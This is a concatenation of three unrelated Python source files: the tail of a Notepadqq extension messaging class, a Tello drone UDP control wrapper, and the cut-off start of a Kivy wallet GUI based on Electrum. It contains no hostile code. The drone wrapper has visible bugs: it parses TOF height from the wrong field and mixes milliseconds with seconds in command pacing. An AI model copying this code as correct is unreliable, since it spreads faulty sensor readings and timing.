notifyReader, _ = yield from asyncio.open_connection(sock=self._notifyRead, loop=loop)
# Start the thread that will receive messages from the socket.
t = threading.Thread(target=self._fill_buffer)
t.start()
while True:
# Asynchronously wait for new messages
yield from notifyReader.read(4096)
while True:
with self._readCondition:
if len(self._unprocessed_messages) > 0:
# Get the first message
data = self._unprocessed_messages.pop(0)
else:
break # from the inner while
# Call the handler
handler_callback(json.loads(data.decode()))
def send_message(self, msg):
"""Sends a JSON message to Notepadqq."""
self._send_raw_message(json.dumps(msg) + "\n")
def get_next_result_message(self):
"""Synchronously wait and return the next result message."""
# FIXME Get next result message with the specified request id, and
# in the meantime keep handling the messages that are not the requested one.
retval = None
while retval is None:
with self._readCondition:
# Look in self._unprocessed_messages for our result message.
# Just for safety, we cycle again on each message even if we
# already checked it in the previous iteration. Nobody should
# read from self._unprocessed_messages while we're running this
# function, but you never know who may pop the data.
for i in range(0, len(self._unprocessed_messages)):
received_message = json.loads(self._unprocessed_messages[i].decode())
if "result" in received_message:
del self._unprocessed_messages[i]
retval = received_message
break # from the for
if retval is None:
# Synchronously wait for new messages
self._readCondition.wait()
return retval
def _send_raw_message(self, msg):
# Send a raw string message to Notepadqq.
data = msg.encode()
self._socket.send(data)
self._logger.debug(">> Sent " + str(data))
def _fill_buffer(self):
# This should run in a different thread. It reads messages from the
# channel and puts them in self._unprocessed_messages.
buf = b''
while True:
buf += self._socket.recv(4096)
parts = buf.split(b'\n')
# The last element is always partial.
buf = parts.pop()
# Print received data for debug
if self._logger.getEffectiveLevel() == logging.DEBUG:
for p in parts:
self._logger.debug("<< Received " + str(p))
with self._readCondition:
self._unprocessed_messages.extend(parts)
# Notify whoever is blocked waiting for new messages
# (e.g. self.get_next_result_message)
self._readCondition.notify()
# Notify event loop (e.g. unlock self.start)
self._notifyWrite.send(b'.')
|
tello.py
|
# coding=utf-8
import logging
import socket
import time
import threading
import queue
import cv2
import numpy as np
from threading import Thread
from djitellopy.decorators import accepts
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf
"""
# Send and receive commands, client socket
UDP_IP = '192.168.10.1'
UDP_PORT = 8889
RESPONSE_TIMEOUT = 7 # in seconds
TIMEOUT_WO_LOG = 0.5
TIME_BTW_COMMANDS = 1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.5 # in seconds
RETRY_COUNT = 3
last_received_command = time.time()
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('%(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
# use logging.getLogger('djitellopy').setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# Video stream, server socket
VS_UDP_IP = '0.0.0.0'
VS_UDP_PORT = 11111
# State stream, server socket
SS_UDP_IP = '0.0.0.0'
SS_UDP_PORT = 8890
# VideoCapture object
cap = None
background_frame_read = None
# DroneState object
background_data_read = None
stream_on = False
def __init__(self, data_queue,
host='192.168.10.1',
port=8889,
client_socket=None,
enable_exceptions=False,
retry_count=3):
self.data_queue = data_queue
self.address = (host, port)
self.response = None
self.state = None
self.stream_on = False
self.enable_exceptions = enable_exceptions
self.retry_count = retry_count
if client_socket:
self.clientSocket = client_socket
else:
self.clientSocket = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
self.clientSocket.bind(('', self.UDP_PORT)) # For UDP response (receiving data)
self.stateSocket = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
self.stateSocket.bind((self.SS_UDP_IP, self.SS_UDP_PORT))
self.stateSocket.settimeout(10)
# Run tello udp receiver on background
thread = threading.Thread(target=self.run_udp_receiver, args=())
thread.daemon = True
thread.start()
# Run tello state reciever in the background
thread_st = threading.Thread(target=self.get_read_state, args=())
thread_st.daemon = True
thread_st.start()
def run_udp_receiver(self):
"""Setup drone UDP receiver. This method listens for responses of Tello. Must be run from a background thread
in order to not block the main thread."""
while True:
try:
self.response, _ = self.clientSocket.recvfrom(1024) # buffer size is 1024 bytes
except Exception as e:
self.LOGGER.error(e)
break
def get_udp_state_address(self):
return 'udp://@' + self.SS_UDP_IP + ':' + str(self.SS_UDP_PORT)
def get_read_state(self):
"""Get the states from the drone.
(pitch:%d;roll:%d;yaw:%d;vgx:%d;vgy%d;vgz:%d;templ:%d;temph:%d;tof:%d;h:%d;bat:%d;
baro:%.2f; time:%d;agx:%.2f;agy:%.2f;agz:%.2f;\r\n)
- pitch: Attitude pitch, degree
- roll: Attitude roll, degree
- yaw: Attitude yaw, degree
- vgx: Speed x,
- vgy: Speed y,
- vgz: Speed z,
- templ: Lowest temperature, celcius degree
- temph: Highest temperature, celcius degree
- tof: TOF distance, cm
- h: Height, cm
- bat: Current battery percentage, %
- baro: Barometer measurement, cm
- time: Motors on time,
- agx: Acceleration x,
- agy: Acceleration y,
- agz: Acceleration z,
Returns: string
"""
while True:
time.sleep(1/25)
try:
state_temp, _ = self.stateSocket.recvfrom(1024) # buffer size is 1024 bytes
self.state = state_temp.decode('ASCII').split(";")
# print(self.state)
# convert to right hand system
pitch = -int(self.state[0][self.state[0].index(":")+1:])
roll = -int(self.state[1][self.state[1].index(":")+1:])
yaw = -int(self.state[2][self.state[2].index(":")+1:])
# tof height
tof = int(self.state[2][self.state[8].index(":")+1:])
# battery percentage
bat = int(self.state[10][self.state[10].index(":")+1:])
#print("tello "+str([pitch, roll, yaw, tof, bat]))
self.data_queue.put([pitch, roll, yaw, tof, bat])
except Exception as e:
self.LOGGER.error(e)
break
def get_udp_video_address(self):
return 'udp://@' + self.VS_UDP_IP + ':' + str(self.VS_UDP_PORT) # + '?overrun_nonfatal=1&fifo_size=5000'
def get_video_capture(self):
"""Get the VideoCapture object from the camera drone
Returns:
VideoCapture
"""
if self.cap is None:
self.cap = cv2.VideoCapture(self.get_udp_video_address())
if not self.cap.isOpened():
self.cap.open(self.get_udp_video_address())
return self.cap
def get_frame_read(self):
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
self.background_frame_read = BackgroundFrameRead(self, self.get_udp_video_address()).start()
return self.background_frame_read
def stop_video_capture(self):
return self.streamoff()
@accepts(command=str)
def send_command_with_return(self, command):
"""Send command to Tello and wait for its response.
Return:
bool: True for successful, False for unsuccessful
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
diff = time.time() * 1000 - self.last_received_command
if diff < self.TIME_BTW_COMMANDS:
time.sleep(diff)
self.LOGGER.info('Send command: ' + command)
timestamp = int(time.time() * 1000)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
while self.response is None:
if (time.time() * 1000) - timestamp > self.RESPONSE_TIMEOUT * 1000:
self.LOGGER.warning('Timeout exceed on command ' + command)
return False
response = self.response.decode('utf-8').rstrip("\r\n")
self.LOGGER.info('Response: ' + response)
self.response = None
self.last_received_command = time.time() * 1000
return response
@accepts(command=str)
def send_command_without_return(self, command):
"""Send command to Tello without expecting a response. Use this method when you want to send a command
continuously
- go x y z speed: Tello fly to x y z in speed (cm/s)
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
- curve x1 y1 z1 x2 y2 z2 speed: Tello fly a curve defined by the current and two given coordinates with
speed (cm/s). If the arc radius is not within the range of 0.5-10 meters, it responses false.
x/y/z can’t be between -20 – 20 at the same time .
x1, x2: 20-500
y1, y2: 20-500
z1, z2: 20-500
speed: 10-60
- rc a b c d: Send RC control via four channels.
a: left/right (-100~100)
b: forward/backward (-100~100)
c: up/down (-100~100)
d: yaw (-100~100)
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
#self.LOGGER.info('Send command (no expect response): ' + command)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
@accepts(command=str)
def send_control_command(self, command):
"""Send control command to Tello and wait for its response. Possible control commands:
- command: entry SDK mode
- takeoff: Tello auto takeoff
- land: Tello auto land
- streamon: Set video stream on
- streamoff: Set video stream off
- emergency: Stop all motors immediately
- up x: Tello fly up with distance x cm. x: 20-500
- down x: Tello fly down with distance x cm. x: 20-500
- left x: Tello fly left with distance x cm. x: 20-500
- right x: Tello fly right with distance x cm. x: 20-500
- forward x: Tello fly forward with distance x cm. x: 20-500
- back x: Tello fly back with distance x cm. x: 20-500
- cw x: Tello rotate x degree clockwise x: 1-3600
- ccw x: Tello rotate x degree counter- clockwise. x: 1-3600
- flip x: Tello fly flip x
l (left)
r (right)
f (forward)
b (back)
- speed x: set speed to x cm/s. x: 10-100
- wifi ssid pass: Set Wi-Fi with SSID password
Return:
bool: True for successful, False for unsuccessful
"""
for i in range(0, self.retry_count):
response = self.send_command_with_return(command)
if response == 'OK' or response == 'ok':
return True
return self.return_error_on_send_command(command, response, self.enable_exceptions)
@accepts(command=str)
def send_read_command(self, command):
"""Send set command to Tello and wait for its response. Possible set commands:
- speed?: get current speed (cm/s): x: 1-100
- battery?: get current battery percentage: x: 0-100
- time?: get current fly time (s): time
- height?: get height (cm): x: 0-3000
- temp?: get temperature (°C): x: 0-90
- acceleration?: get IMU acceleration data (0.001g): x y z
- attitude?: get IMU attitude data: pitch roll yaw
- baro?: get barometer value (m): x
- tof?: get distance value from TOF (cm): x: 30-1000
- wifi?: get Wi-Fi SNR: snr
Return:
bool: True for successful, False for unsuccessful
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
pass
if ('error' not in response) and ('ERROR' not in response) and ('False' not in response):
if response.isdigit():
return int(response)
else:
return response
else:
return self.return_error_on_send_command(command, response, self.enable_exceptions)
@accepts(command=str)
def send_command_with_return_wo_log(self, command):
"""Send command to Tello and wait for its response, w/o logging.
Return:
bool: True for successful, False for unsuccessful
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
diff = time.time() * 1000 - self.last_received_command
if diff < self.TIME_BTW_COMMANDS:
time.sleep(diff)
timestamp = int(time.time() * 1000)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
while self.response is None:
if (time.time() * 1000) - timestamp > self.TIMEOUT_WO_LOG * 1000:
self.LOGGER.warning('Timeout exceed on command ' + command)
return False
response = self.response.decode('utf-8').rstrip("\r\n")
self.response = None
self.last_received_command = time.time() * 1000
return response
@accepts(command=str)
def send_read_command_wo_log(self, command):
"""Send set command to Tello and wait for its response, w/o logging.
Return:
bool: True for successful, False for unsuccessful
"""
response = self.send_command_with_return_wo_log(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
pass
if ('error' not in response) and ('ERROR' not in response) and ('False' not in response):
if response.isdigit():
return int(response)
else:
return response
else:
return self.return_error_on_send_command(command, response, self.enable_exceptions)
@staticmethod
def return_error_on_send_command(command, response, enable_exceptions):
"""Returns False and print an informative result code to show unsuccessful response"""
msg = 'Command ' + command + ' was unsuccessful. Message: ' + str(response)
if enable_exceptions:
raise Exception(msg)
else:
#self.LOGGER.error(msg)
return False
def connect(self):
"""Entry SDK mode
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("command")
def takeoff(self):
"""Tello auto takeoff
Returns:
bool: True for successful, False for unsuccessful
False: Unsuccessful
"""
return self.send_control_command("takeoff")
def land(self):
"""Tello auto land
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("land")
def streamon(self):
"""Set video stream on. If the response is 'Unknown command' means you have to update the Tello firmware. That
can be done through the Tello app.
Returns:
bool: True for successful, False for unsuccessful
"""
result = self.send_control_command("streamon")
if result is True:
self.stream_on = True
return result
def streamoff(self):
"""Set video stream off
Returns:
bool: True for successful, False for unsuccessful
"""
result = self.send_control_command("streamoff")
if result is True:
self.stream_on = False
return result
def emergency(self):
"""Stop all motors immediately
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("emergency")
@accepts(direction=str, x=int)
def move(self, direction, x):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command(direction + ' ' + str(x))
@accepts(x=int)
def move_up(self, x):
"""Tello fly up with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("up", x)
@accepts(x=int)
def move_down(self, x):
"""Tello fly down with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("down", x)
@accepts(x=int)
def move_left(self, x):
"""Tello fly left with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("left", x)
@accepts(x=int)
def move_right(self, x):
"""Tello fly right with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("right", x)
@accepts(x=int)
def move_forward(self, x):
"""Tello fly forward with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("forward", x)
@accepts(x=int)
def move_back(self, x):
"""Tello fly back with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("back", x)
@accepts(x=int)
def rotate_clockwise(self, x):
"""Tello rotate x degree clockwise.
Arguments:
x: 1-360
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("cw " + str(x))
@accepts(x=int)
def rotate_counter_clockwise(self, x):
"""Tello rotate x degree counter-clockwise.
Arguments:
x: 1-3600
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("ccw " + str(x))
@accepts(x=str)
def flip(self, direction):
"""Tello fly flip.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("flip " + direction)
def flip_left(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("l")
def flip_right(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("r")
def flip_forward(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("f")
def flip_back(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("b")
@accepts(x=int, y=int, z=int, speed=int)
def go_xyz_speed(self, x, y, z, speed):
"""Tello fly to x y z in speed (cm/s)
Arguments:
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_command_without_return('go %s %s %s %s' % (x, y, z, speed))
@accepts(x1=int, y1=int, z1=int, x2=int, y2=int, z2=int, speed=int)
def curve_xyz_speed(self, x1, y1, z1, x2, y2, z2, speed):
"""Tello fly a curve defined by the current and two given coordinates with speed (cm/s).
- If the arc radius is not within the range of 0.5-10 meters, it responses false.
- x/y/z can’t be between -20 – 20 at the same time.
Arguments:
x1: 20-500
x2: 20-500
y1: 20-500
y2: 20-500
z1: 20-500
z2: 20-500
speed: 10-60
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_command_without_return('curve %s %s %s %s %s %s %s' % (x1, y1, z1, x2, y2, z2, speed))
@accepts(x=int, y=int, z=int, speed=int, mid=int)
def go_xyz_speed_mid(self, x, y, z, speed, mid):
"""Tello fly to x y z in speed (cm/s) relative to mission pad with id mid
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('go %s %s %s %s m%s' % (x, y, z, speed, mid))
@accepts(x1=int, y1=int, z1=int, x2=int, y2=int, z2=int, speed=int, mid=int)
def curve_xyz_speed_mid(self, x1, y1, z1, x2, y2, z2, speed, mid):
"""Tello fly to x2 y2 z2 over x1 y1 z1 in speed (cm/s) relative to mission pad with id mid
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('curve %s %s %s %s %s %s %s m%s' % (x1, y1, z1, x2, y2, z2, speed, mid))
@accepts(x=int, y=int, z=int, speed=int, yaw=int, mid1=int, mid2=int)
def go_xyz_speed_yaw_mid(self, x, y, z, speed, yaw, mid1, mid2):
"""Tello fly to x y z in speed (cm/s) relative to mid1
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('jump %s %s %s %s %s m%s m%s' % (x, y, z, speed, yaw, mid1, mid2))
def enable_mission_pads(self):
return self.send_control_command("mon")
def disable_mission_pads(self):
return self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
return self.send_control_command("mdirection " + str(x))
@accepts(x=int)
def set_speed(self, x):
"""Set speed to x cm/s.
Arguments:
x: 10-100
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("speed " + str(x))
last_rc_control_sent = 0
@accepts(left_right_velocity=int, forward_backward_velocity=int, up_down_velocity=int, yaw_velocity=int)
def send_rc_control(self, left_right_velocity, forward_backward_velocity, up_down_velocity, yaw_velocity):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
Returns:
bool: True for successful, False for unsuccessful
"""
if int(time.time() * 1000) - self.last_rc_control_sent < self.TIME_BTW_RC_CONTROL_COMMANDS:
pass
else:
self.last_rc_control_sent = int(time.time() * 1000)
return self.send_command_without_return('rc %s %s %s %s' % (left_right_velocity, forward_backward_velocity,
up_down_velocity, yaw_velocity))
def set_wifi_credentials(self, ssid, password):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('wifi %s %s' % (ssid, password))
def connect_to_wifi(self, ssid, password):
"""Connects to the Wi-Fi with SSID and password.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('ap %s %s' % (ssid, password))
def get_speed(self):
"""Get current speed (cm/s)
Returns:
False: Unsuccessful
int: 1-100
"""
return self.send_read_command('speed?')
def get_battery(self):
"""Get current battery percentage
Returns:
False: Unsuccessful
int: -100
"""
return self.send_read_command('battery?')
def get_flight_time(self):
"""Get current fly time (s)
Returns:
False: Unsuccessful
int: Seconds elapsed during flight.
"""
return self.send_read_command('time?')
def get_height(self):
"""Get height (cm)
Returns:
False: Unsuccessful
int: 0-3000
"""
return self.send_read_command('height?')
def get_temperature(self):
"""Get temperature (°C)
Returns:
False: Unsuccessful
int: 0-90
"""
return self.send_read_command('temp?')
def get_attitude(self):
"""Get IMU attitude data
Returns:
False: Unsuccessful
int: pitch roll yaw
"""
return self.send_read_command('attitude?')
def get_barometer(self):
"""Get barometer value (m)
Returns:
False: Unsuccessful
int: 0-100
"""
return self.send_read_command('baro?')
def get_distance_tof(self):
"""Get distance value from TOF (cm)
Returns:
False: Unsuccessful
int: 30-1000
"""
return self.send_read_command('tof?')
def get_wifi(self):
"""Get Wi-Fi SNR
Returns:
False: Unsuccessful
str: snr
"""
return self.send_read_command('wifi?')
def get_sdk_version(self):
"""Get SDK Version
Returns:
False: Unsuccessful
str: SDK Version
"""
return self.send_read_command('sdk?')
def get_serial_number(self):
"""Get Serial Number
Returns:
False: Unsuccessful
str: Serial Number
"""
return self.send_read_command('sn?')
def end(self):
"""Call this method when you want to end the tello object"""
if self.stream_on:
self.streamoff()
if self.background_frame_read is not None:
self.background_frame_read.stop()
if self.cap is not None:
self.cap.release()
class BackgroundFrameRead:
"""
This class read frames from a VideoCapture in background. Then, just call backgroundFrameRead.frame to get the
actual one.
"""
def __init__(self, tello, address):
tello.cap = cv2.VideoCapture(address)
self.cap = tello.cap
if not self.cap.isOpened():
self.cap.open(address)
self.grabbed, self.frame = self.cap.read()
self.stopped = False
def start(self):
Thread(target=self.update_frame, args=()).start()
return self
def update_frame(self):
while not self.stopped:
if not self.grabbed or not self.cap.isOpened():
self.stop()
else:
(self.grabbed, self.frame) = self.cap.read()
def stop(self):
self.stopped = True
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum.invoices import PR_PAID, PR_FAILED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum.logging import Logger
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
if str(intent.getScheme()).lower() in ('bitcoin', 'lightning'):
self._process_invoice_str(data)
_invoice_intent_queued = None # type: Optional[str]
def _process_invoice_str(self, invoice: str) -> None:
if not self.wallet:
self._invoice_intent_queued = invoice
return
if not self.send_screen:
self.switch_to('send')
self._invoice_intent_queued = invoice
return
if invoice.lower().startswith('qtum:'):
self.set_URI(invoice)
elif invoice.lower().startswith('lightning:'):
self.set_ln_invoice(invoice)
def _maybe_process_queued_invoice(self, *dt):
if not self.wallet:
return
invoice_queued = self._invoice_intent_queued
if invoice_queued:
self._invoice_intent_queued = None
self._process_invoice_str(invoice_queued)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
